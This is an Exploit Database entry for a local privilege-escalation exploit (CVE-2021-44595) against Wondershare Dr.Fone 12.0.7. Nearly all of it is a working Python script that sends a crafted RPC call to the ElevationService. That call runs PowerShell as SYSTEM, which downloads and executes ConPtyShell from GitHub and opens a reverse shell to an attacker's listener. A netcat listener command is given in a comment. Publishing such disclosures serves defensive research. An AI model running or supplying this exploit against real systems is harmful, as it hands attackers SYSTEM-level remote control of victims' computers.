Wondershare Dr.Fone 12.0.7 – Privilege Escalation (ElevationService)

• Exploit Database
• 17 阅读

• 作者： Netanel Cohen
  日期： 2022-05-11
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/50912/

• # Exploit Title: Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService)
  # Date: 4/27/2022
  # Exploit Author: Netanel Cohen & Tomer Peled
  # Vendor Homepage: https://drfone.wondershare.net/
  # Software Link: https://download.wondershare.net/drfone_full4008.exe
  # Version: up to 12.0.7
  # Tested on: Windows 10
  # CVE : 2021-44595
  # References: https://github.com/netanelc305/WonderShell
  
  #Wondershare Dr. Fone Latest version as of 2021-12-06 is vulnerable to Incorrect Access Control. A normal user can send manually crafted packets to the ElevationService.exe and #execute arbitrary code without any validation with SYSTEM privileges.
  
  #!/bin/python3
  import msgpackrpc
  
  LADDR = "192.168.14.129"
  LPORT =1338
  
  RADDR = "192.168.14.137"
  RPORT = 12345
  
  param = f"IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell {LADDR} {int(LPORT)}"
  client = msgpackrpc.Client(msgpackrpc.Address(RADDR, 12345))
  result = client.call('system_s','powershell',param)
  
  # stty raw -echo; (stty size; cat) | nc -lvnp 1338